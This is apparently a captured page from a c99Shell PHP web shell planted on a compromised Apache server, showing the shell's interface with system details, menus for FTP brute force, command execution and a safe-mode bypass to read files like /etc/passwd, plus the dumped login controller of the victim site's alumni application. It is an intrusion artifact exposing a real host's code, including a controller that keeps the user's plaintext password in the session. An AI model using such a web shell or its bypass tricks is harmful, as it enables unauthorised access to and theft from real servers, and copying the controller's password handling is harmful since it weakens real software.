110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/stdalumni/application/controllers/ums/ drwxr-xr-x Free 50.66 GB of 127.8 GB (39.64%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/stdalumni/application/controllers/ums/ drwxr-xr-x
Free 50.66 GB of 127.8 GB (39.64%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php
require('ums_controller.php');
class Main extends Ums_controller {
    public $data;
    
    function index() {
        if($this->session->userdata('sess_ums_login')){
            $this->output('v_home');
        } else {
            $this->output('v_login');
        }
    }
    
    function login() {
        $this->load->model($this->config->item('ums_folder').'m_umuser','m_umuser');
        $m_umuser=$this->m_umuser;
        $user = $this->input->post('user');
        $pass = $this->input->post('pass');
        if($m_umuser->check_user($user,$pass)){
            $newdata = array(
                'sess_ums_user'  => $user,
                'sess_ums_pass'     => $pass,
                'sess_ums_login' => TRUE
            );
            $this->session->set_userdata($newdata);
            redirect(site_url().'/'.$this->config->item('ums_folder').'main');
        } else {
            $this->output('v_loginFailed');
        }
    }
        
    function logout(){
        $this->session->sess_destroy();        
        redirect(site_url().'/'.$this->config->item('ums_folder').'main');
    }
    
    function umShowGroup(){
        $this->output('v_home');
    }
    
    function umQuestion(){
        $this->output('v_home');
    }
}

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: